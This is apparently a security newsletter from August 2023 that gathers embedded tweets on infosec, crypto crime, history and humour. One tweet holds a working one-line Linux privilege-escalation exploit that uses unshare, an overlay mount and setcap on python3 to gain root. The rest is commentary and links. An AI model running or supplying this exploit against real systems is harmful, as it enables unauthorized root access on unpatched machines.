the grugq's newsletter

August 5, 2023


Exploit is so easy it fits in a tweet🔥
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' https://t.co/qb53rfeh0y pic.twitter.com/O9lcif1Yad

— liad eliyahu (@liadeliyahu) July 28, 2023

It has, in fact, been heard of. https://t.co/goCDs0uc36

— Blake Herzinger | @bdherzinger.bsky.social (@BDHerzinger) August 4, 2023

pic.twitter.com/9G8yUK7ZtT

— Classical Studies Memes for Hellenistic Teens (@CSMFHT) August 4, 2023

The transatlantic econ discourse pic.twitter.com/1rQeqWJxSn

— IYER Ⓥ (@IyerC) August 4, 2023

Don't fear the tool. Fear the vulns. Police are alerting on @flipper_zero's potential for bypassing access control systems. I wouldn't call it a bypass. These are systems *missing* access control and relying on solely security by obscurity. pic.twitter.com/53nFcdIIfS

— Chris Wysopal (@WeldPond) August 3, 2023

PSA if you see code that uses nodejs's url.parse in combination with a standards-compliant URL parser (like window.URL, nodejs URL, etc.) it's likely to have some security issues pic.twitter.com/CbQGBRODGJ

— yan (@bcrypt) August 3, 2023

wow this presentation by @scannell_simon is such a great read with the clever ideas to defeat ASLR (in a "black hole").:) https://t.co/cAcxK26UUc

— Haifei Li (@HaifeiLi) August 4, 2023

https://cfp.recon.cx/media/2023/submissions/KTMT73/resources/ClamAV_REcon_T3KMBct.pdf


Last night in a surprising final twist in an already bonkers story the husband in this cyber crime couple admitted he was the hacker in the original 2016 theft of $4.5bn. He blew his 'rapper' wife a kiss from the dock as they were both sent down. https://t.co/yip2IrgHOA

— Joe Tidy (@joetidy) August 4, 2023

In border radio’s early days, psychics and mystics ruled the airwaves: https://t.co/vXwNzeozmY

— Jaka Bartolj (@MediaHistoryNow) August 4, 2023

"Google has 175,000+ capable and well-compensated employees who get very little done."

Google will make arguments they need to monopolize to improve their product but the truth everyone knows is that Google Search now sucks. https://t.co/b7skoCNGxL

— Matt Stoller (@matthewstoller) August 4, 2023

We, the JPEG'd team, based on confidential discussions, formally assert that upon successful return of the funds to the JPEG'd DAO multisig:

1. Legal action will not be taken against the operator of the address 0x6Ec21d1868743a44318c3C259a6d4953F9978538 and…

— JPEG'd (@JPEGd_69) August 4, 2023

pic.twitter.com/T5Xx4tdYYU

— No Context Brits (@NoContextBrits) August 4, 2023

Could the superconducting material be the key to unlocking the lab leak controversy? It may seem unlikely, but nothing is impossible... on the blockchain. We ask three MMT experts for their input, and along the way chat to them about their pick of NFTs.

— Liam Bright (@lastpositivist) August 2, 2023

https://t.co/J9FYFMJTcZ pic.twitter.com/gS9xzH3z6u

— Jack Tindale (@JackTindale) August 4, 2023

Full Pages | Kelmscott Chaucer


🚨 InfoSec Journos and researchers be aware, fake profiles are popping for some of our industry’s favourites. Motive is unknown, potentially just a crypto scam. But keep an eye out in case it’s an APT trying something.

Cc @TonyaJoRiley @joetidy

⚠️ Fake Profiles ⬇️ pic.twitter.com/heyF23vORC

— Will (@BushidoToken) August 5, 2023

Akira Kurosawa's Ran — an epic riff on King Lear that required 200 horses, 1,400 suits of armor, building a full-size *castle* on the slopes of Mt. Fuji & burning it down, and spraying an entire field gold for a scene that got cut — cost almost $200 million less than The Flash.

— david ehrlich (@davidehrlich) August 4, 2023

https://t.co/sMBXY20qAj

— Dr. Dan Lomas (@Sandbagger_01) August 5, 2023
